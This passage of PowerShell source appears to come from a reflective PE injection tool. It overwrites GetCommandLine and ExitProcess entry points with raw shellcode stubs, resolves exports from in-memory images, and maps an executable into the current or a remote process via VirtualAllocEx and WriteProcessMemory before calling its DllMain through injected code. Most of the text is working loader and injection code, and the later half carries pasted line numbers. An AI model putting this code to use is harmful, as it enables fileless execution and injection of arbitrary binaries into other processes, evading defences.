        if ($KernelBaseHandle -eq [IntPtr]::Zero)
        {
            throw "KernelBase handle null"
        }




        # Unmanaged copies of the arguments. They are deliberately never freed: the pointers
        # are embedded in the patched GetCommandLineA/W bodies below and must outlive this call.
        $CmdLineWArgsPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArguments)
        $CmdLineAArgsPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($ExeArguments)

        [IntPtr]$GetCommandLineAAddr = $Win32Functions.GetProcAddress.Invoke($KernelBaseHandle, "GetCommandLineA")
        [IntPtr]$GetCommandLineWAddr = $Win32Functions.GetProcAddress.Invoke($KernelBaseHandle, "GetCommandLineW")

        if ($GetCommandLineAAddr -eq [IntPtr]::Zero -or $GetCommandLineWAddr -eq [IntPtr]::Zero)
        {
            throw "GetCommandLine ptr null. GetCommandLineA: $(Get-Hex $GetCommandLineAAddr). GetCommandLineW: $(Get-Hex $GetCommandLineWAddr)"
        }


        # Stub layout written over each GetCommandLine* entry point:
        #   [0x48] 0xb8 <pointer>   mov rax/eax, <pointer>   (REX.W prefix only on x64)
        #   0xc3                    ret
        [Byte[]]$Shellcode1 = @()
        if ($PtrSize -eq 8)
        {
            $Shellcode1 += 0x48
        }
        $Shellcode1 += 0xb8

        [Byte[]]$Shellcode2 = @(0xc3)
        $TotalSize = $Shellcode1.Length + $PtrSize + $Shellcode2.Length



        # Save the original bytes so they can be restored later (Copy-ArrayOfMemAddresses).
        $GetCommandLineAOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize)
        $GetCommandLineWOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize)
        $Win32Functions.memcpy.Invoke($GetCommandLineAOrigBytesPtr, $GetCommandLineAAddr, [UInt64]$TotalSize) | Out-Null
        $Win32Functions.memcpy.Invoke($GetCommandLineWOrigBytesPtr, $GetCommandLineWAddr, [UInt64]$TotalSize) | Out-Null
        $ReturnArray += ,($GetCommandLineAAddr, $GetCommandLineAOrigBytesPtr, $TotalSize)
        $ReturnArray += ,($GetCommandLineWAddr, $GetCommandLineWOrigBytesPtr, $TotalSize)


        [UInt32]$OldProtectFlag = 0
        $Success = $Win32Functions.VirtualProtect.Invoke($GetCommandLineAAddr, [UInt32]$TotalSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)
        # NOTE(review): '=' is an assignment, not a comparison, so this branch can never run
        # and $Success is overwritten with $false. The same pattern recurs three more times below.
        if ($Success = $false)
        {
            throw "Call to VirtualProtect failed"
        }

        $GetCommandLineAAddrTemp = $GetCommandLineAAddr
        Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineAAddrTemp
        $GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp ($Shellcode1.Length)
        [System.Runtime.InteropServices.Marshal]::StructureToPtr($CmdLineAArgsPtr, $GetCommandLineAAddrTemp, $false)
        $GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp $PtrSize
        Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $GetCommandLineAAddrTemp

        # Restore the previous page protection once the stub is in place.
        $Win32Functions.VirtualProtect.Invoke($GetCommandLineAAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null



        [UInt32]$OldProtectFlag = 0
        $Success = $Win32Functions.VirtualProtect.Invoke($GetCommandLineWAddr, [UInt32]$TotalSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)
        # NOTE(review): assignment instead of -eq; the check is ineffective.
        if ($Success = $false)
        {
            throw "Call to VirtualProtect failed"
        }

        $GetCommandLineWAddrTemp = $GetCommandLineWAddr
        Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp
        $GetCommandLineWAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineWAddrTemp ($Shellcode1.Length)
        [System.Runtime.InteropServices.Marshal]::StructureToPtr($CmdLineWArgsPtr, $GetCommandLineWAddrTemp, $false)
        $GetCommandLineWAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineWAddrTemp $PtrSize
        Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $GetCommandLineWAddrTemp

        $Win32Functions.VirtualProtect.Invoke($GetCommandLineWAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null








        # MSVC runtimes cache the command line in their own _acmdln/_wcmdln globals; each
        # loaded runtime in this list gets those globals repointed at the new arguments.
        $DllList = @("msvcr70d.dll", "msvcr71d.dll", "msvcr80d.dll", "msvcr90d.dll", "msvcr100d.dll", "msvcr110d.dll", "msvcr70.dll" `
            , "msvcr71.dll", "msvcr80.dll", "msvcr90.dll", "msvcr100.dll", "msvcr110.dll")

        foreach ($Dll in $DllList)
        {
            [IntPtr]$DllHandle = $Win32Functions.GetModuleHandle.Invoke($Dll)
            if ($DllHandle -ne [IntPtr]::Zero)
            {
                [IntPtr]$WCmdLnAddr = $Win32Functions.GetProcAddress.Invoke($DllHandle, "_wcmdln")
                [IntPtr]$ACmdLnAddr = $Win32Functions.GetProcAddress.Invoke($DllHandle, "_acmdln")
                if ($WCmdLnAddr -eq [IntPtr]::Zero -or $ACmdLnAddr -eq [IntPtr]::Zero)
                {
                    # NOTE(review): this string is written to the output stream, not thrown, so
                    # execution continues below with a zero address for the missing symbol.
                    "Error, couldn't find _wcmdln or _acmdln"
                }

                # Fresh unmanaged copies per runtime; like the ones above they are never freed.
                $NewACmdLnPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($ExeArguments)
                $NewWCmdLnPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArguments)


                # Save the original pointer values so they can be restored later.
                $OrigACmdLnPtr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ACmdLnAddr, [Type][IntPtr])
                $OrigWCmdLnPtr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($WCmdLnAddr, [Type][IntPtr])
                $OrigACmdLnPtrStorage = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)
                $OrigWCmdLnPtrStorage = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)
                [System.Runtime.InteropServices.Marshal]::StructureToPtr($OrigACmdLnPtr, $OrigACmdLnPtrStorage, $false)
                [System.Runtime.InteropServices.Marshal]::StructureToPtr($OrigWCmdLnPtr, $OrigWCmdLnPtrStorage, $false)
                $ReturnArray += ,($ACmdLnAddr, $OrigACmdLnPtrStorage, $PtrSize)
                $ReturnArray += ,($WCmdLnAddr, $OrigWCmdLnPtrStorage, $PtrSize)

                $Success = $Win32Functions.VirtualProtect.Invoke($ACmdLnAddr, [UInt32]$PtrSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)
                # NOTE(review): assignment instead of -eq; the check is ineffective.
                if ($Success = $false)
                {
                    throw "Call to VirtualProtect failed"
                }
                [System.Runtime.InteropServices.Marshal]::StructureToPtr($NewACmdLnPtr, $ACmdLnAddr, $false)
                $Win32Functions.VirtualProtect.Invoke($ACmdLnAddr, [UInt32]$PtrSize, [UInt32]($OldProtectFlag), [Ref]$OldProtectFlag) | Out-Null

                $Success = $Win32Functions.VirtualProtect.Invoke($WCmdLnAddr, [UInt32]$PtrSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)
                # NOTE(review): assignment instead of -eq; the check is ineffective.
                if ($Success = $false)
                {
                    throw "Call to VirtualProtect failed"
                }
                [System.Runtime.InteropServices.Marshal]::StructureToPtr($NewWCmdLnPtr, $WCmdLnAddr, $false)
                $Win32Functions.VirtualProtect.Invoke($WCmdLnAddr, [UInt32]$PtrSize, [UInt32]($OldProtectFlag), [Ref]$OldProtectFlag) | Out-Null
            }
        }






        # NOTE(review): this reset discards every restore entry recorded above (GetCommandLine*
        # and _acmdln/_wcmdln), so only the exit-function patches below are returned to the
        # caller. Whether that is intentional is not visible from this function.
        $ReturnArray = @()
        $ExitFunctions = @()


        [IntPtr]$MscoreeHandle = $Win32Functions.GetModuleHandle.Invoke("mscoree.dll")
        if ($MscoreeHandle -eq [IntPtr]::Zero)
        {
            throw "mscoree handle null"
        }
        [IntPtr]$CorExitProcessAddr = $Win32Functions.GetProcAddress.Invoke($MscoreeHandle, "CorExitProcess")
        if ($CorExitProcessAddr -eq [IntPtr]::Zero)
        {
            Throw "CorExitProcess address not found"
        }
        $ExitFunctions += $CorExitProcessAddr


        [IntPtr]$ExitProcessAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "ExitProcess")
        if ($ExitProcessAddr -eq [IntPtr]::Zero)
        {
            Throw "ExitProcess address not found"
        }
        $ExitFunctions += $ExitProcessAddr

        [UInt32]$OldProtectFlag = 0
        foreach ($ProcExitFunctionAddr in $ExitFunctions)
        {
            $ProcExitFunctionAddrTmp = $ProcExitFunctionAddr


            # Stub written over each exit function (x86 encoding; x64 variant below adds REX
            # prefixes and uses rbx/rsp):
            #   0xbb <ExeDoneBytePtr>        mov ebx, <ExeDoneBytePtr>
            #   0xc6 0x03 0x01               mov byte [ebx], 1        ; mark the EXE as finished
            #   0x83 0xec 0x20               sub esp, 0x20            ; shadow space
            #   0x83 0xe4 0xc0               and esp, -0x40           ; align the stack
            #   0xbb <ExitThreadAddr>        mov ebx, <ExitThread>
            #   0xff 0xd3                    call ebx                 ; end only this thread
            [Byte[]]$Shellcode1 = @(0xbb)
            [Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x83, 0xec, 0x20, 0x83, 0xe4, 0xc0, 0xbb)

            if ($PtrSize -eq 8)
            {
                [Byte[]]$Shellcode1 = @(0x48, 0xbb)
                [Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xbb)
            }
            [Byte[]]$Shellcode3 = @(0xff, 0xd3)
            # Two immediates (done-byte pointer and ExitThread address) are embedded in the stub.
            $TotalSize = $Shellcode1.Length + $PtrSize + $Shellcode2.Length + $PtrSize + $Shellcode3.Length

            [IntPtr]$ExitThreadAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "ExitThread")
            if ($ExitThreadAddr -eq [IntPtr]::Zero)
            {
                Throw "ExitThread address not found"
            }

            $Success = $Win32Functions.VirtualProtect.Invoke($ProcExitFunctionAddr, [UInt32]$TotalSize, [UInt32]$Win32Constants.PAGE_EXECUTE_READWRITE, [Ref]$OldProtectFlag)
            if ($Success -eq $false)
            {
                Throw "Call to VirtualProtect failed"
            }


            # Save the original bytes; these entries are the ones actually returned to the caller.
            $ExitProcessOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize)
            $Win32Functions.memcpy.Invoke($ExitProcessOrigBytesPtr, $ProcExitFunctionAddr, [UInt64]$TotalSize) | Out-Null
            $ReturnArray += ,($ProcExitFunctionAddr, $ExitProcessOrigBytesPtr, $TotalSize)



            Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $ProcExitFunctionAddrTmp
            $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp ($Shellcode1.Length)
            [System.Runtime.InteropServices.Marshal]::StructureToPtr($ExeDoneBytePtr, $ProcExitFunctionAddrTmp, $false)
            $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp $PtrSize
            Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $ProcExitFunctionAddrTmp
            $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp ($Shellcode2.Length)
            [System.Runtime.InteropServices.Marshal]::StructureToPtr($ExitThreadAddr, $ProcExitFunctionAddrTmp, $false)
            $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp $PtrSize
            Write-BytesToMemory -Bytes $Shellcode3 -MemoryAddress $ProcExitFunctionAddrTmp

            $Win32Functions.VirtualProtect.Invoke($ProcExitFunctionAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null
        }


        Write-Output $ReturnArray
    }
  2072.  
  2073.  
  2074.  
  2075.  
    Function Copy-ArrayOfMemAddresses
    {
        # Write a list of saved byte buffers back to their original addresses. Each element
        # of $CopyInfo is a triple (destination address, source buffer, byte count) — the
        # shape produced by Update-ExeFunctions — and is applied in order: make the
        # destination writable, memcpy the bytes, then restore the previous protection.
        # Throws if the first VirtualProtect fails. The source buffers are not freed here.
        #
        # $CopyInfo       - array of (IntPtr dest, IntPtr src, size) triples
        # $Win32Functions - delegate table; uses VirtualProtect and memcpy
        # $Win32Constants - constant table; uses PAGE_EXECUTE_READWRITE
        Param(
        [Parameter(Position = 0, Mandatory = $true)]
        [Array[]]
        $CopyInfo,

        [Parameter(Position = 1, Mandatory = $true)]
        [System.Object]
        $Win32Functions,

        [Parameter(Position = 2, Mandatory = $true)]
        [System.Object]
        $Win32Constants
        )

        [UInt32]$OldProtectFlag = 0
        foreach ($Info in $CopyInfo)
        {
            $Success = $Win32Functions.VirtualProtect.Invoke($Info[0], [UInt32]$Info[2], [UInt32]$Win32Constants.PAGE_EXECUTE_READWRITE, [Ref]$OldProtectFlag)
            if ($Success -eq $false)
            {
                Throw "Call to VirtualProtect failed"
            }

            # memcpy(dest, src, size): copy the saved bytes over the patched location.
            $Win32Functions.memcpy.Invoke($Info[0], $Info[1], [UInt64]$Info[2]) | Out-Null

            # Return code of the restoring VirtualProtect is intentionally ignored.
            $Win32Functions.VirtualProtect.Invoke($Info[0], [UInt32]$Info[2], [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null
        }
    }
  2106.  
  2107.  
  2108.  
  2109.  
  2110.  
    Function Get-MemoryProcAddress
    {
        # Resolve an exported function by name in a PE image that is already mapped at
        # $PEHandle, by walking the image's export directory (the in-memory equivalent of
        # GetProcAddress for a manually loaded module).
        #
        # $PEHandle     - base address of the mapped image
        # $FunctionName - export name to look up; the comparison is case-sensitive (-ceq)
        # Returns the absolute address of the export, or [IntPtr]::Zero when the image has
        # no export table or no export of that name.
        Param(
        [Parameter(Position = 0, Mandatory = $true)]
        [IntPtr]
        $PEHandle,

        [Parameter(Position = 1, Mandatory = $true)]
        [String]
        $FunctionName
        )

        # Helper tables and the parsed headers are rebuilt on every call.
        $Win32Types = Get-Win32Types
        $Win32Constants = Get-Win32Constants
        $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants


        if ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ExportTable.Size -eq 0)
        {
            return [IntPtr]::Zero
        }
        # Export directory = image base + the data directory's RVA.
        $ExportTablePtr = Add-SignedIntAsUnsigned ($PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ExportTable.VirtualAddress)
        $ExportTable = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ExportTablePtr, [Type]$Win32Types.IMAGE_EXPORT_DIRECTORY)

        # Linear scan of the name table; AddressOfNames is an array of UInt32 RVAs to ANSI strings.
        for ($i = 0; $i -lt $ExportTable.NumberOfNames; $i++)
        {

            $NameOffsetPtr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfNames + ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt32])))
            $NamePtr = Add-SignedIntAsUnsigned ($PEHandle) ([System.Runtime.InteropServices.Marshal]::PtrToStructure($NameOffsetPtr, [Type][UInt32]))
            $Name = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($NamePtr)

            if ($Name -ceq $FunctionName)
            {

                # Name index i -> UInt16 ordinal (AddressOfNameOrdinals) -> UInt32 function RVA (AddressOfFunctions).
                $OrdinalPtr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfNameOrdinals + ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt16])))
                $FuncIndex = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OrdinalPtr, [Type][UInt16])
                $FuncOffsetAddr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfFunctions + ($FuncIndex * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt32])))
                $FuncOffset = [System.Runtime.InteropServices.Marshal]::PtrToStructure($FuncOffsetAddr, [Type][UInt32])
                # NOTE(review): the RVA is returned as an address unconditionally; forwarder
                # entries, if the image has any, are not distinguished here — TODO confirm callers never need that.
                return Add-SignedIntAsUnsigned ($PEHandle) ($FuncOffset)
            }
        }

        return [IntPtr]::Zero
    }
  2156.  
  2157.  
  2158.     Function Invoke-MemoryLoadLibrary
  2159.     {
  2160.         Param(
  2161.         [Parameter( Position = 0, Mandatory = $true )]
  2162.         [Byte[]]
  2163.         $PEBytes,
  2164.  
  2165.         [Parameter(Position = 1, Mandatory = $false)]
  2166.         [String]
  2167.         $ExeArgs,
  2168.  
  2169.         [Parameter(Position = 2, Mandatory = $false)]
  2170.         [IntPtr]
  2171.         $RemoteProcHandle,
  2172.  
  2173.         [Parameter(Position = 3)]
  2174.         [Bool]
  2175.         $ForceASLR = $false
  2176.         )
  2177.  
  2178.         $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])
  2179.  
  2180.  
  2181.         $Win32Constants = Get-Win32Constants
  2182.         $Win32Functions = Get-Win32Functions
  2183.         $Win32Types = Get-Win32Types
  2184.  
  2185.         $RemoteLoading = $false
  2186.         if (($RemoteProcHandle -ne $null) -and ($RemoteProcHandle -ne [IntPtr]::Zero))
  2187.         {
  2188.             $RemoteLoading = $true
  2189.         }
  2190.  
  2191.  
  2192.         Write-Verbose "Getting basic PE information from the file"
  2193.         $PEInfo = Get-PEBasicInfo -PEBytes $PEBytes -Win32Types $Win32Types
  2194.         $OriginalImageBase = $PEInfo.OriginalImageBase
  2195.         $NXCompatible = $true
  2196.         if (([Int] $PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT)
  2197.         {
  2198.             Write-Warning "PE is not compatible with DEP, might cause issues" -WarningAction Continue
  2199.             $NXCompatible = $false
  2200.         }
  2201.  
  2202.  
  2203.  
  2204.         $Process64Bit = $true
  2205.         if ($RemoteLoading -eq $true)
  2206.         {
  2207.             $Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("kernel32.dll")
  2208.             $Result = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "IsWow64Process")
  2209.             if ($Result -eq [IntPtr]::Zero)
  2210.             {
  2211.                 Throw "Couldn't locate IsWow64Process function to determine if target process is 32bit or 64bit"
  2212.             }
  2213.  
  2214.             [Bool]$Wow64Process = $false
  2215.             $Success = $Win32Functions.IsWow64Process.Invoke($RemoteProcHandle, [Ref]$Wow64Process)
  2216.             if ($Success -eq $false)
  2217.             {
  2218.                 Throw "Call to IsWow64Process failed"
  2219.             }
  2220.  
  2221.             if (($Wow64Process -eq $true) -or (($Wow64Process -eq $false) -and ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 4)))
  2222.             {
  2223.                 $Process64Bit = $false
  2224.             }
  2225.  
  2226.  
  2227.             $PowerShell64Bit = $true
  2228.             if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -ne 8)
  2229.             {
  2230.                 $PowerShell64Bit = $false
  2231.             }
  2232.             if ($PowerShell64Bit -ne $Process64Bit)
  2233.             {
  2234.                 throw "PowerShell must be same architecture (x86/x64) as PE being loaded and remote process"
  2235.             }
  2236.         }
  2237.         else
  2238.         {
  2239.             if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -ne 8)
  2240.             {
  2241.                 $Process64Bit = $false
  2242.             }
  2243.         }
  2244.         if ($Process64Bit -ne $PEInfo.PE64Bit)
  2245.         {
  2246.             Throw "PE platform doesn't match the architecture of the process it is being loaded in (32/64bit)"
  2247.         }
  2248.  
  2249.  
  2250.  
  2251.         Write-Verbose "Allocating memory for the PE and write its headers to memory"
  2252.  
  2253.  
  2254.         [IntPtr]$LoadAddr = [IntPtr]::Zero
  2255.         $PESupportsASLR = ([Int] $PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) -eq $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE
  2256.         if ((-not $ForceASLR) -and (-not $PESupportsASLR))
  2257.         {
  2258.             Write-Warning "PE file being reflectively loaded is not ASLR compatible. If the loading fails, try restarting PowerShell and trying again OR try using the -ForceASLR flag (could cause crashes)" -WarningAction Continue
  2259.             [IntPtr]$LoadAddr = $OriginalImageBase
  2260.         }
  2261.         elseif ($ForceASLR -and (-not $PESupportsASLR))
  2262.         {
  2263.             Write-Verbose "PE file doesn't support ASLR but -ForceASLR is set. Forcing ASLR on the PE file. This could result in a crash."
  2264.         }
  2265.  
  2266.         if ($ForceASLR -and $RemoteLoading)
  2267.         {
  2268.             Write-Error "Cannot use ForceASLR when loading in to a remote process." -ErrorAction Stop
  2269.         }
  2270.         if ($RemoteLoading -and (-not $PESupportsASLR))
  2271.         {
  2272.             Write-Error "PE doesn't support ASLR. Cannot load a non-ASLR PE in to a remote process" -ErrorAction Stop
  2273.         }
  2274.  
  2275.         $PEHandle = [IntPtr]::Zero
  2276.         $EffectivePEHandle = [IntPtr]::Zero
  2277.         if ($RemoteLoading -eq $true)
  2278.         {
  2279.  
  2280.             $PEHandle = $Win32Functions.VirtualAlloc.Invoke([IntPtr]::Zero, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
  2281.  
  2282.  
  2283.             $EffectivePEHandle = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, $LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
  2284.             if ($EffectivePEHandle -eq [IntPtr]::Zero)
  2285.             {
  2286.                 Throw "Unable to allocate memory in the remote process. If the PE being loaded doesn't support ASLR, it could be that the requested base address of the PE is already in use"
  2287.             }
  2288.         }
  2289.         else
  2290.         {
  2291.             if ($NXCompatible -eq $true)
  2292.             {
  2293.                 $PEHandle = $Win32Functions.VirtualAlloc.Invoke($LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
  2294.             }
  2295.             else
  2296.             {
  2297.                 $PEHandle = $Win32Functions.VirtualAlloc.Invoke($LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
  2298.             }
  2299.             $EffectivePEHandle = $PEHandle
  2300.         }
  2301.  
  2302.         [IntPtr]$PEEndAddress = Add-SignedIntAsUnsigned ($PEHandle) ([Int64]$PEInfo.SizeOfImage)
  2303.         if ($PEHandle -eq [IntPtr]::Zero)
  2304.         {
  2305.             Throw "VirtualAlloc failed to allocate memory for PE. If PE is not ASLR compatible, try running the script in a new PowerShell process (the new PowerShell process will have a different memory layout, so the address the PE wants might be free)."
  2306.         }
  2307.         [System.Runtime.InteropServices.Marshal]::Copy($PEBytes, 0, $PEHandle, $PEInfo.SizeOfHeaders) | Out-Null
  2308.  
  2309.  
  2310.  
  2311.         Write-Verbose "Getting detailed PE information from the headers loaded in memory"
  2312.         $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants
  2313.         $PEInfo | Add-Member -MemberType NoteProperty -Name EndAddress -Value $PEEndAddress
  2314.         $PEInfo | Add-Member -MemberType NoteProperty -Name EffectivePEHandle -Value $EffectivePEHandle
  2315.         Write-Verbose "StartAddress: $(Get-Hex $PEHandle)    EndAddress: $(Get-Hex $PEEndAddress)"
  2316.  
  2317.  
  2318.  
  2319.         Write-Verbose "Copy PE sections in to memory"
  2320.         Copy-Sections -PEBytes $PEBytes -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types
  2321.  
  2322.  
  2323.  
  2324.         Write-Verbose "Update memory addresses based on where the PE was actually loaded in memory"
  2325.         Update-MemoryAddresses -PEInfo $PEInfo -OriginalImageBase $OriginalImageBase -Win32Constants $Win32Constants -Win32Types $Win32Types
  2326.  
  2327.  
  2328.  
  2329.         Write-Verbose "Import DLL's needed by the PE we are loading"
  2330.         if ($RemoteLoading -eq $true)
  2331.         {
  2332.             Import-DllImports -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants -RemoteProcHandle $RemoteProcHandle
  2333.         }
  2334.         else
  2335.         {
  2336.             Import-DllImports -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants
  2337.         }
  2338.  
  2339.  
  2340.  
  2341.         if ($RemoteLoading -eq $false)
  2342.         {
  2343.             if ($NXCompatible -eq $true)
  2344.             {
  2345.                 Write-Verbose "Update memory protection flags"
  2346.                 Update-MemoryProtectionFlags -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants -Win32Types $Win32Types
  2347.             }
  2348.             else
  2349.             {
  2350.                 Write-Verbose "PE being reflectively loaded is not compatible with NX memory, keeping memory as read write execute"
  2351.             }
  2352.         }
  2353.         else
  2354.         {
  2355.             Write-Verbose "PE being loaded in to a remote process, not adjusting memory permissions"
  2356.         }
  2357.  
  2358.  
  2359.  
  2360.         if ($RemoteLoading -eq $true)
  2361.         {
  2362.             [UInt32]$NumBytesWritten = 0
  2363.             $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $EffectivePEHandle, $PEHandle, [UIntPtr]($PEInfo.SizeOfImage), [Ref]$NumBytesWritten)
  2364.             if ($Success -eq $false)
  2365.             {
  2366.                 Throw "Unable to write shellcode to remote process memory."
  2367.             }
  2368.         }
  2369.  
  2370.  
  2371.  
  2372.         if ($PEInfo.FileType -ieq "DLL")
  2373.         {
  2374.             if ($RemoteLoading -eq $false)
  2375.             {
  2376.                 Write-Verbose "Calling dllmain so the DLL knows it has been loaded"
  2377.                 $DllMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)
  2378.                 $DllMainDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr]) ([Bool])
  2379.                 $DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate)
  2380.  
  2381.                 $DllMain.Invoke($PEInfo.PEHandle, 1, [IntPtr]::Zero) | Out-Null
  2382.             }
  2383.             else
  2384.             {
  2385.                 $DllMainPtr = Add-SignedIntAsUnsigned ($EffectivePEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)
  2386.  
  2387.                 if ($PEInfo.PE64Bit -eq $true)
  2388.                 {
  2389.  
  2390.                     $CallDllMainSC1 = @(0x53, 0x48, 0x89, 0xe3, 0x66, 0x83, 0xe4, 0x00, 0x48, 0xb9)
  2391.                     $CallDllMainSC2 = @(0xba, 0x01, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0xb8)
  2392.                     $CallDllMainSC3 = @(0xff, 0xd0, 0x48, 0x89, 0xdc, 0x5b, 0xc3)
  2393.                 }
  2394.                 else
  2395.                 {
  2396.  
  2397.                     $CallDllMainSC1 = @(0x53, 0x89, 0xe3, 0x83, 0xe4, 0xf0, 0xb9)
  2398.                     $CallDllMainSC2 = @(0xba, 0x01, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x50, 0x52, 0x51, 0xb8)
  2399.                     $CallDllMainSC3 = @(0xff, 0xd0, 0x89, 0xdc, 0x5b, 0xc3)
  2400.                 }
  2401.                 $SCLength = $CallDllMainSC1.Length + $CallDllMainSC2.Length + $CallDllMainSC3.Length + ($PtrSize * 2)
  2402.                 $SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength)
  2403.                 $SCPSMemOriginal = $SCPSMem
  2404.  
  2405.                 Write-BytesToMemory -Bytes $CallDllMainSC1 -MemoryAddress $SCPSMem
  2406.                 $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC1.Length)
  2407.                 [System.Runtime.InteropServices.Marshal]::StructureToPtr($EffectivePEHandle, $SCPSMem, $false)
  2408.                 $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
  2409.                 Write-BytesToMemory -Bytes $CallDllMainSC2 -MemoryAddress $SCPSMem
  2410.                 $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC2.Length)
  2411.                 [System.Runtime.InteropServices.Marshal]::StructureToPtr($DllMainPtr, $SCPSMem, $false)
  2412.                 $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
  2413.                 Write-BytesToMemory -Bytes $CallDllMainSC3 -MemoryAddress $SCPSMem
  2414.                 $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC3.Length)
  2415.  
